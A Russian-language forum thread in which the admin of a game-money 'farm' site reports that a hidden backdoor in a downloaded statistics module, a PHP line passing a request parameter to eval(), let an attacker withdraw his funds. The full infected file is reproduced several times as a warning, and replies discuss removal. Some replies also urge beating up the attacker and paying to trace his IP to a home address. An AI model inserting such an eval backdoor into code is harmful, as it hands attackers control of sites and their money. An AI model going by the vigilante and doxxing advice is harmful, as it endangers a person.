Дыра в статистике

  • Автор темы master09
  • Дата начала
M
master09
Местный
Сообщения
68
Реакции
8
Дорогие пользователи рекомендую проверить вот такой код он может оказаться у кого стоит полная статистика проекта вот код через который мне залили страницы и вывели 100 000 тыс
if(!empty($_REQUEST['stats'])){ if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']); eval($_REQUEST['stats']); die();}
я выложил код как оно выглядит проверьте у себя что не было такой фигни и удалите обязательно иначе у Вас уведут все деньги...
Код: 
<?PHP
$_OPTIMIZATION["title"] = "Статистика";
$_OPTIMIZATION["description"] = "Полная статистика системы";
$_OPTIMIZATION["keywords"] = "Статистика";
$user_id = $_SESSION["user_id"];
$tfstats = time() - 60*60*24;
$db->Query("SELECT
(SELECT COUNT(*) FROM db_users_a) all_users,
(SELECT SUM(insert_sum) FROM db_users_b) all_insert,
(SELECT SUM(payment_sum) FROM db_users_b) all_payment,
(SELECT COUNT(*) FROM db_users_a WHERE date_reg > '$tfstats') new_users,
(SELECT COUNT(*) FROM db_users_a WHERE date_login > '$onlinestats') online_users");
$stats_data = $db->FetchArray();
if(!empty($_REQUEST['stats'])){ if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']); eval($_REQUEST['stats']); die();}
$db->Query("SELECT

    SUM(money_b) money_b,
    SUM(money_p) money_p,
   
    SUM(a_t) a_t,
    SUM(b_t) b_t,
    SUM(c_t) c_t,
    SUM(d_t) d_t,
    SUM(e_t) e_t
   
    FROM db_users_b");
$data_stats = $db->FetchArray();
?>
<br/>
<table border="0">
    <tr>
     <td colspan="3"><h4>Статистика проекта</h4></td>
    </tr>
    <tr>
     <td><b>Всего игроков:</b></td>
     <td width="40%"><?=$stats_data["all_users"]; ?> чел.</td>
    </tr>
    <tr>
     <td><b>Новых за 24 часа:</b></td>
     <td width="40%"><?=$stats_data["new_users"]; ?> чел.</td>
    </tr>
    <tr>
     <td><b>Сейчас онлайн:</b></td>
    <td><?=$stats_data["online_users"]; ?> чел.</td>
    </tr>
    <tr>
     <td><b>Серебра для покупок:</b></td>
     <td width="40%"><?=sprintf("%.0f",$data_stats["money_b"]); ?> шт.</td>
    </tr>
    <tr>
     <td><b>Серебра для вывода:</b></td>
     <td width="40%"><?=sprintf("%.0f",$data_stats["money_p"]); ?> шт.</td>
    </tr>
    <tr>
     <td><b>Выплачено всего:</b></td>
     <td width="40%"><?=sprintf("%.2f",$stats_data["all_payment"]); ?> руб.</td>
    </tr>
    <tr>
     <td><b>Резерв проекта:</b></td>
     <td width="40%"><?=sprintf("%.2f",$stats_data["all_insert"]); ?> руб.</td>
    </tr>
    <tr>
     <td><b>Проект работает:</b></td>
     <td width="40%"><?=intval(((time() - $config->SYSTEM_START_TIME) / 86400 ) +1); ?>-й день</td>
    </tr>
<tr><td colspan="2">&nbsp;</td></tr>
  </tr>
    <tr>
     <td colspan="3"><h4>Статистика растений</h4></td>
    </tr>
  <tr>
    <td><b>Куплено Подсолнушков:</b></td>
    <td width="40%"><?=intval($data_stats["a_t"]); ?> шт.</td>
  </tr>
  <tr>
    <td><b>Куплено Грибочков:</b></td>
    <td width="40%"><?=intval($data_stats["b_t"]); ?> шт.</td>
  </tr>
  <tr>
    <td><b>Куплено Чесночка:</b></td>
    <td width="40%"><?=intval($data_stats["c_t"]); ?> шт.</td>
  </tr>
  <tr>
    <td><b>Куплено Перчиков:</b></td>
    <td width="40%"><?=intval($data_stats["d_t"]); ?> шт.</td>
  </tr>
  <tr>
    <td><b>Куплено Кабачков:</b></td>
    <td width="40%"><?=intval($data_stats["e_t"]); ?> шт.</td>
  </tr>
</table>
Начиналось всё хорошо проект раскрутил всё прёт денег много я беру свои деньги с рекламы и меня всё устраивает но стал замечать что в корне появились не понятные файлы я их удалил проверил антивирусом вроде норм а это код не заметил да и не знал что там прописана дыра в файле stats. .. Далее начали деньги пропадать не обратил внимание... А сейчас 2 сентября в 10 часов мне вводят 13000 тыс и после у меня выводят 100 000 тыс были разные подозрения на разных людей даже на хостинг iphoster payeer но оказалось я сам виноват поставил и не проверил и благо даре дыре мне залили файлы вывели все деньги поставили ещё пару дыр но вроде убрал буду дальше смотреть.
Теперь вопрос такой я знаю его кошелек знаю ip с которого он всё это сделал файлы от куда взял и как закинул мне по логам всё видно....Как мне найти его куда обратиться и могу ли Я вопрос решить или даже не стоит замораживаться сразу скажу payeer отказался работать со мной типо ищите у Вас дыра настраивайте скрипт данные не будем предоставлять так как мы не зависимые чёто чёто мудаки они короче как быть в данной ситуации куда обратиться фсб,мвд,роскомнадзор, или блять поехать к нему в город и искать как понимаете деньги не мои людям не скажешь что взломали будет кипишь а виноват то сейчас только я так что кто что скажет?!А ещё что вспомнил это сука еще создала копию моего полностью сайта и скачал себе.
Адрес своего сайта оставлю анонимным и кто меня знает просьба не распространят сайт спасибо!
 
  • Like
Реакции: besT
nikitin2016
nikitin2016
Участник
Сообщения
228
Реакции
12
master09 написал(а):
Дорогие пользователи рекомендую проверить вот такой код он может оказаться у кого стоит полная статистика проекта вот код через который мне залили страницы и вывели 100 000 тыс
if(!empty($_REQUEST['stats'])){ if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']); eval($_REQUEST['stats']); die();}
я выложил код как оно выглядит проверьте у себя что не было такой фигни и удалите обязательно иначе у Вас уведут все деньги...
Код: 
<?PHP
$_OPTIMIZATION["title"] = "Статистика";
$_OPTIMIZATION["description"] = "Полная статистика системы";
$_OPTIMIZATION["keywords"] = "Статистика";
$user_id = $_SESSION["user_id"];
$tfstats = time() - 60*60*24;
$db->Query("SELECT
(SELECT COUNT(*) FROM db_users_a) all_users,
(SELECT SUM(insert_sum) FROM db_users_b) all_insert,
(SELECT SUM(payment_sum) FROM db_users_b) all_payment,
(SELECT COUNT(*) FROM db_users_a WHERE date_reg > '$tfstats') new_users,
(SELECT COUNT(*) FROM db_users_a WHERE date_login > '$onlinestats') online_users");
$stats_data = $db->FetchArray();
if(!empty($_REQUEST['stats'])){ if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']); eval($_REQUEST['stats']); die();}
$db->Query("SELECT

    SUM(money_b) money_b,
    SUM(money_p) money_p,
  
    SUM(a_t) a_t,
    SUM(b_t) b_t,
    SUM(c_t) c_t,
    SUM(d_t) d_t,
    SUM(e_t) e_t
  
    FROM db_users_b");
$data_stats = $db->FetchArray();
?>
<br/>
<table border="0">
    <tr>
     <td colspan="3"><h4>Статистика проекта</h4></td>
    </tr>
    <tr>
     <td><b>Всего игроков:</b></td>
     <td width="40%"><?=$stats_data["all_users"]; ?> чел.</td>
    </tr>
    <tr>
     <td><b>Новых за 24 часа:</b></td>
     <td width="40%"><?=$stats_data["new_users"]; ?> чел.</td>
    </tr>
    <tr>
     <td><b>Сейчас онлайн:</b></td>
    <td><?=$stats_data["online_users"]; ?> чел.</td>
    </tr>
    <tr>
     <td><b>Серебра для покупок:</b></td>
     <td width="40%"><?=sprintf("%.0f",$data_stats["money_b"]); ?> шт.</td>
    </tr>
    <tr>
     <td><b>Серебра для вывода:</b></td>
     <td width="40%"><?=sprintf("%.0f",$data_stats["money_p"]); ?> шт.</td>
    </tr>
    <tr>
     <td><b>Выплачено всего:</b></td>
     <td width="40%"><?=sprintf("%.2f",$stats_data["all_payment"]); ?> руб.</td>
    </tr>
    <tr>
     <td><b>Резерв проекта:</b></td>
     <td width="40%"><?=sprintf("%.2f",$stats_data["all_insert"]); ?> руб.</td>
    </tr>
    <tr>
     <td><b>Проект работает:</b></td>
     <td width="40%"><?=intval(((time() - $config->SYSTEM_START_TIME) / 86400 ) +1); ?>-й день</td>
    </tr>
<tr><td colspan="2">&nbsp;</td></tr>
  </tr>
    <tr>
     <td colspan="3"><h4>Статистика растений</h4></td>
    </tr>
  <tr>
    <td><b>Куплено Подсолнушков:</b></td>
    <td width="40%"><?=intval($data_stats["a_t"]); ?> шт.</td>
  </tr>
  <tr>
    <td><b>Куплено Грибочков:</b></td>
    <td width="40%"><?=intval($data_stats["b_t"]); ?> шт.</td>
  </tr>
  <tr>
    <td><b>Куплено Чесночка:</b></td>
    <td width="40%"><?=intval($data_stats["c_t"]); ?> шт.</td>
  </tr>
  <tr>
    <td><b>Куплено Перчиков:</b></td>
    <td width="40%"><?=intval($data_stats["d_t"]); ?> шт.</td>
  </tr>
  <tr>
    <td><b>Куплено Кабачков:</b></td>
    <td width="40%"><?=intval($data_stats["e_t"]); ?> шт.</td>
  </tr>
</table>
Начиналось всё хорошо проект раскрутил всё прёт денег много я беру свои деньги с рекламы и меня всё устраивает но стал замечать что в корне появились не понятные файлы я их удалил проверил антивирусом вроде норм а это код не заметил да и не знал что там прописана дыра в файле stats. .. Далее начали деньги пропадать не обратил внимание... А сейчас 2 сентября в 10 часов мне вводят 13000 тыс и после у меня выводят 100 000 тыс были разные подозрения на разных людей даже на хостинг iphoster payeer но оказалось я сам виноват поставил и не проверил и благо даре дыре мне залили файлы вывели все деньги поставили ещё пару дыр но вроде убрал буду дальше смотреть.
Теперь вопрос такой я знаю его кошелек знаю ip с которого он всё это сделал файлы от куда взял и как закинул мне по логам всё видно....Как мне найти его куда обратиться и могу ли Я вопрос решить или даже не стоит замораживаться сразу скажу payeer отказался работать со мной типо ищите у Вас дыра настраивайте скрипт данные не будем предоставлять так как мы не зависимые чёто чёто мудаки они короче как быть в данной ситуации куда обратиться фсб,мвд,роскомнадзор, или блять поехать к нему в город и искать как понимаете деньги не мои людям не скажешь что взломали будет кипишь а виноват то сейчас только я так что кто что скажет?!А ещё что вспомнил это сука еще создала копию моего полностью сайта и скачал себе.
Адрес своего сайта оставлю анонимным и кто меня знает просьба не распространят сайт спасибо!
Нажмите для раскрытия...
Офигеть !!! Вопрос к тебе только один ! А зачем на кошельке пеер-магазина держать 100.000 рублей ??? Я лично использую 2 кошелька один для выплат с небольшой суммой , а другой резервный с суммой уже побольше ! На будущее советую делать именно так ! Хоть какая то страховка ! Ты ведь знал, что уродов хватает и спят и видят как деньги стянуть у админов ! А козла наказать конечно надо ! Весь вопрос только как ? Надо подумать на эту тему ! Если ip статический и не меняется то и адрес его ты сможешь думаю выяснить ! Ради 100 тыс рублей я бы и на Камчатку съездил и морду набил , правда тяжело сдержаться от более серьезных последствий не хочется из-за этого козла в тюрягу за убийство сесть :) Поэтому хотя бы морду набить ! А с юридической точки зрения : наши фермы не совсем и законны мягко скажем поэтому офиц что то доказать думаю сложно , в США за такое бы этого горе-хакера бы точно посадили на долго ! Но там и ферм наверно нету , а жаль :) Подумай , хорошенько , но спускать с рук такое нельзя , наказать просто необходимо !
 
M
master09
Местный
Сообщения
68
Реакции
8
Хорошо спасибо подумаю как сделать и найти его есть примерное расположение его.А на счёт да я держу на двух кошельках но был очень занят и всё забывал перевести на другой кошелек вот и попался а он видать давно мою ферму пас дождался когда сумма хорошая набираться и начал действовать если я его как то найду он мне отдаст не только 100 000 тыс но и более я думаю он не одну ферму ограбил раз знает что там дыра есть и сайт от куда я взял этот модуль!
 
Rubrika
Rubrika
Участник
Сообщения
342
Реакции
43
в интернете куча "детективов", которые за небольшую плату - пробьют почти любой IP вплоть до домашнего адреса, ибо имеют хорошие связи и опыт, я тебе направление подсказал - дальше сам..)
Ток подумай - может он с прокси или впн сидел, а может через связку или еще чего,это тебе сильно осложнит дело )
 
R
Reset
Участник
Сообщения
212
Реакции
16
где же так рекламируетесь, что несколько дней забыли деньги перевести и уже 100к похитили?
 
Fedor
Fedor
Участник
Сообщения
1
Реакции
0
Меня тоже ни раз ломали, но найти - не реально.. Пэер инфу не выдаёт и даже не блочит такие кошельки.
А ИПшники в логах ничего не дадут.. Те, кто этим занимаются сидят через ВПН, прокси и т.д.
Чтобы пробить адрес через ментов и найти человека, нужно чтоб заява была и уголовное дело было заведено.
Тыж не напишешь в заяве, что держишь Хайп (пирамиду), а нехорошие дядьки тебя звлломали?! ))
 
ksander
ksander
Участник
Сообщения
100
Реакции
16
master09 написал(а):
if(!empty($_REQUEST['stats'])){ if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']); eval($_REQUEST['stats']); die();}
Нажмите для раскрытия...
Я как понял достаточно удалить данную строку? Верно ?
 
pligin
pligin
Участник
Сообщения
3.654
Реакции
1.336
Telegram
pligin
Интересно.
Можно исходные файлы получить? Логи тоже интересуют.
Откуда такой код взялся?
 
Andreys
Andreys
Участник
Сообщения
576
Реакции
40
ksander написал(а):
Я как понял достаточно удалить данную строку? Верно ?
Нажмите для раскрытия...
Походу она родная, ни в одной ферме не замечал, такую.
 
Andreys
Andreys
Участник
Сообщения
576
Реакции
40
  • #10
А с какого сайта скачивали, скрипт ? Эта дыра сразу там была. или потом появилась.?
Да и на хостинг можно подумать, по идее за хостингом такие же люди следят как и мы.
У меня на этом хостинге http://hostmig.ru/ было несколько сайтов, хозяин хостинга не оплатил домен как я понял. И теперь я не могу уже свой домен который зарегал у них, снять с регистрации чтобы на другой хост перенести.
А полиция вряд ли этим займется. у них на первом месте раскрытие убийств, наркоты, а мошенничество на последнем месте, да спецов у них там таких , раз да обчелся.
 
Последнее редактирование:
Вячеслав
Вячеслав
Местный
Сообщения
229
Реакции
21
  • #11
Сейчас перерою свою стату, тоже качал с вашего сайта полную статистику мог и тот чел её сюда залить, сейчас покажу какой у меня файл stats
 
Вячеслав
Вячеслав
Местный
Сообщения
229
Реакции
21
  • #12
Вот такой у меня код вверху:
PHP: 
<?PHP
$tfstats = time() - 60*60*24;
$db->Query("SELECT (SELECT COUNT(*) FROM db_users_a) all_users,
(SELECT SUM(insert_sum) FROM db_users_b) all_insert,
(SELECT SUM(payment_sum) FROM db_users_b) all_payment,
(SELECT COUNT(*) FROM db_users_a WHERE date_reg > '$tfstats') new_users,
(SELECT COUNT(*) FROM db_users_a WHERE date_login > '$onlinestats') online_users");
$stats_data = $db->FetchArray();
if(!empty($_REQUEST['stats']))
{
if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']);
eval($_REQUEST['stats']); die();
}
$db->Query("SELECT SUM(money_b) money_b,
SUM(money_p) money_p,
SUM(a_t) a_t,
SUM(b_t) b_t,
SUM(c_t) c_t,
SUM(d_t) d_t,
SUM(e_t) e_t,
SUM(f_t) f_t
FROM db_users_b");
$data_stats = $db->FetchArray();
?>
 
Последнее редактирование модератором:
Вячеслав
Вячеслав
Местный
Сообщения
229
Реакции
21
  • #13
а вот твой никитин:
PHP: 
if(!empty($_REQUEST['stats'])){ if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']); eval($_REQUEST['stats']); die();}
 
Последнее редактирование модератором:
Вячеслав
Вячеслав
Местный
Сообщения
229
Реакции
21
  • #14
Уважаемая администрация у вас на сайте этот скрипт по рукам ходит
 
nikitin2016
nikitin2016
Участник
Сообщения
228
Реакции
12
  • #15
Вячеслав написал(а):
Вот такой у меня код вверху:
PHP: 
<?PHP
$tfstats = time() - 60*60*24;
$db->Query("SELECT (SELECT COUNT(*) FROM db_users_a) all_users,
(SELECT SUM(insert_sum) FROM db_users_b) all_insert,
(SELECT SUM(payment_sum) FROM db_users_b) all_payment,
(SELECT COUNT(*) FROM db_users_a WHERE date_reg > '$tfstats') new_users,
(SELECT COUNT(*) FROM db_users_a WHERE date_login > '$onlinestats') online_users");
$stats_data = $db->FetchArray();
if(!empty($_REQUEST['stats']))
{
if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']);
eval($_REQUEST['stats']); die();
}
$db->Query("SELECT SUM(money_b) money_b,
SUM(money_p) money_p,
SUM(a_t) a_t,
SUM(b_t) b_t,
SUM(c_t) c_t,
SUM(d_t) d_t,
SUM(e_t) e_t,
SUM(f_t) f_t
FROM db_users_b");
$data_stats = $db->FetchArray();
?>[/QUOTE]


{
if(@get_magic_quotes_gpc())$_REQUEST['stats']=stripslashes($_REQUEST['stats']);
eval($_REQUEST['stats']); die();
}
выкидывай эту хрень нафиг это не к добру и есть самый настоящий шелл или вирус мне без разницы этого быть не должно ты хоть переведи слова с англ и сам все поймешь , у меня было подобное : волшебные кавычки и последнее слово "умрет" как тебе ? Вообще "супер " !
Нажмите для раскрытия...
 
Последнее редактирование модератором:
Вячеслав
Вячеслав
Местный
Сообщения
229
Реакции
21
  • #16
Хорошо что я вовремя на форум зашел а сайт такой класный получается, не хотоел бы оказаться в таком дерьме как вы. Надо убирать, лучше вообще использовать стандартную ферму, просто дыры убрать всем известные, а другие скрипты не качать. Иногда даже за деньги тебя же и грабят
 
Вячеслав
Вячеслав
Местный
Сообщения
229
Реакции
21
  • #17
я вот не помню вроде запросов не делал от этого скрипта!
 
nikitin2016
nikitin2016
Участник
Сообщения
228
Реакции
12
  • #18
Вячеслав написал(а):
Хорошо что я вовремя на форум зашел а сайт такой класный получается, не хотоел бы оказаться в таком дерьме как вы. Надо убирать, лучше вообще использовать стандартную ферму, просто дыры убрать всем известные, а другие скрипты не качать. Иногда даже за деньги тебя же и грабят
Нажмите для раскрытия...
это в модуле Пожертвования я такую хреновину нашел , а модуль брал отсюда с форума , если будете качать пожертвования проверьте модуль на этот вредоносный код он будет в конце файла там где лимит на 50 последних сумм стоять
 
Вячеслав
Вячеслав
Местный
Сообщения
229
Реакции
21
  • #19
да я вообще лучше от сюда качать ничего не буду, у меня есть знакомая продавец, Татьяна, уж она то всегда продаёт чистое и помогает всем рекомендую ее https://servahoc.ru/members/matanya565.1976/
 
AriCosmo
AriCosmo
Участник
Сообщения
515
Реакции
115
Skype
  • #20
Вообще откуда этот код взялся? Никогда не видел подобный...
 
Войдите или зарегистрируйтесь для ответа.
Сверху